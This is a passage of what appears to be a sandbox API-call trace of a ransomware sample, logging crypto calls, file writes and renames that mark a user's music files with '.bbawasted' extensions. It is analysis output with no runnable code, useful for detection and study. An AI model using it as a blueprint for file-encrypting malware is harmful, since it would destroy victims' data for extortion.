dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0073.159] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0073.159] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.167] SetEndOfFile (hFile=0xfc) returned 1 [0073.169] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.169] CloseHandle (hObject=0xfc) returned 1 [0073.171] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5be700 | out: hHeap=0x580000) returned 1 [0073.171] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0073.172] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0073.172] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.172] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8EB2kYjOlQubLK.m4a") returned 58 [0073.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x27e) returned 0x5d0700 [0073.172] lstrcpyW (in: lpString1=0x5d0774, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.172] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.172] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0073.173] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.173] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8EB2kYjOlQubLK.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8eb2kyjolqublk.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0073.174] WriteFile (in: hFile=0xfc, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0073.175] SetEndOfFile (hFile=0xfc) returned 1 [0073.175] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0073.175] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.175] lstrcpyW (in: lpString1=0x5d0774, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0073.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8EB2kYjOlQubLK.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8eb2kyjolqublk.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8EB2kYjOlQubLK.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8eb2kyjolqublk.m4a.bbawasted")) returned 1 [0073.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\8EB2kYjOlQubLK.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\8eb2kyjolqublk.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0073.176] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0073.177] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0073.178] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0073.178] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.178] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0073.178] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0073.178] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.187] SetEndOfFile (hFile=0xfc) returned 1 [0073.189] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0073.190] CloseHandle (hObject=0xfc) returned 1 [0073.191] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5d0700 | out: hHeap=0x580000) returned 1 [0073.191] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0073.192] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0073.192] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.192] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aWI-WdaoYqpuK EZ21.wav") returned 62 [0073.192] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5abbd8 [0073.192] lstrcpyW (in: lpString1=0x5abc54, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0073.192] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0073.192] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0073.193] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0073.193] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0073.193] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aWI-WdaoYqpuK EZ21.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\awi-wdaoyqpuk ez21.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.508] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.509] SetEndOfFile (hFile=0x120) returned 1 [0074.510] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.510] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.510] lstrcpyW (in: lpString1=0x5abc54, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.510] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aWI-WdaoYqpuK EZ21.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\awi-wdaoyqpuk ez21.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aWI-WdaoYqpuK EZ21.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\awi-wdaoyqpuk ez21.wav.bbawasted")) returned 1 [0074.511] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\aWI-WdaoYqpuK EZ21.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\awi-wdaoyqpuk ez21.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.511] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.515] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.516] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.516] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.516] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.517] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.517] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.529] SetEndOfFile (hFile=0x120) returned 1 [0074.532] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.532] CloseHandle (hObject=0x120) returned 1 [0074.534] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abbd8 | out: hHeap=0x580000) returned 1 [0074.534] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.536] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.536] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.536] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sKq27sQUxLhc4FiTvi.wav") returned 62 [0074.536] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x286) returned 0x5abbd8 [0074.536] lstrcpyW (in: lpString1=0x5abc54, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.536] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.536] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.537] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.537] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.537] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sKq27sQUxLhc4FiTvi.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\skq27squxlhc4fitvi.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.538] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.539] SetEndOfFile (hFile=0x120) returned 1 [0074.539] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.539] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.539] lstrcpyW (in: lpString1=0x5abc54, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.540] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sKq27sQUxLhc4FiTvi.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\skq27squxlhc4fitvi.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sKq27sQUxLhc4FiTvi.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\skq27squxlhc4fitvi.wav.bbawasted")) returned 1 [0074.540] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\sKq27sQUxLhc4FiTvi.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\skq27squxlhc4fitvi.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.541] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.545] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.546] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.546] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.546] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.547] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.547] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.583] SetEndOfFile (hFile=0x120) returned 1 [0074.633] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.633] CloseHandle (hObject=0x120) returned 1 [0074.635] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abbd8 | out: hHeap=0x580000) returned 1 [0074.635] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.635] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.635] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.635] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YQ7B.m4a") returned 48 [0074.636] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26a) returned 0x5bf4a0 [0074.636] lstrcpyW (in: lpString1=0x5bf500, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.636] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.636] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.636] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.636] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.636] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YQ7B.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yq7b.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.637] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.638] SetEndOfFile (hFile=0x120) returned 1 [0074.638] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.638] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.639] lstrcpyW (in: lpString1=0x5bf500, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YQ7B.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yq7b.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YQ7B.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yq7b.m4a.bbawasted")) returned 1 [0074.639] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YQ7B.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yq7b.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.640] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0074.640] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.641] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.641] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.641] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.642] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.642] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.650] SetEndOfFile (hFile=0x120) returned 1 [0074.652] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.652] CloseHandle (hObject=0x120) returned 1 [0074.654] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf4a0 | out: hHeap=0x580000) returned 1 [0074.654] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.655] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.655] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.655] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z_54ODA1.wav") returned 52 [0074.655] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x272) returned 0x5bf4a0 [0074.655] lstrcpyW (in: lpString1=0x5bf508, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.655] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.655] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.656] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.656] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.656] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z_54ODA1.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z_54oda1.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.656] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.657] SetEndOfFile (hFile=0x120) returned 1 [0074.657] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.657] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.658] lstrcpyW (in: lpString1=0x5bf508, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.658] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z_54ODA1.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z_54oda1.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z_54ODA1.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z_54oda1.wav.bbawasted")) returned 1 [0074.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\z_54ODA1.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\z_54oda1.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0074.658] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.662] CryptAcquireContextW (in: phProv=0x119fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fe84*=0x5a4020) returned 1 [0074.662] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5be748 | out: pbBuffer=0x5be748) returned 1 [0074.663] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.663] CryptAcquireContextW (in: phProv=0x119fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fbec*=0x5a4020) returned 1 [0074.663] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0x119fc08 | out: pbBuffer=0x119fc08) returned 1 [0074.663] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.735] SetEndOfFile (hFile=0x120) returned 1 [0074.737] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.737] CloseHandle (hObject=0x120) returned 1 [0074.738] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf4a0 | out: hHeap=0x580000) returned 1 [0074.739] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.739] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0x119ff08 | out: pbBuffer=0x119ff08) returned 1 [0074.739] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.739] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1") returned 49 [0074.739] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x26c) returned 0x5bf070 [0074.740] lstrcpyW (in: lpString1=0x5bf0d2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.740] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5c6ff0 [0074.740] CryptAcquireContextW (in: phProv=0x119fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fea8*=0x5a4020) returned 1 [0074.740] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5c6ff0 | out: pbBuffer=0x5c6ff0) returned 1 [0074.740] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.741] WriteFile (in: hFile=0x120, lpBuffer=0x5c6ff0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x119fec4, lpOverlapped=0x0 | out: lpBuffer=0x5c6ff0*, lpNumberOfBytesWritten=0x119fec4*=0xa3a, lpOverlapped=0x0) returned 1 [0074.742] SetEndOfFile (hFile=0x120) returned 1 [0074.742] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.742] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0074.742] lstrcpyW (in: lpString1=0x5bf0d2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.742] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.bbawasted")) returned 0 [0074.743] GetLastError () returned 0x20 [0074.743] CloseHandle (hObject=0x120) returned 1 [0074.744] lstrcpyW (in: lpString1=0x5bf0d2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.744] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\ntuser.dat.LOG1.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat.log1.bbawasted_info")) returned 1 [0074.745] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.745] CryptAcquireContextW (in: phProv=0x119fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x119fecc*=0x5a4020) returned 1 [0074.746] CryptGenRandom (in: 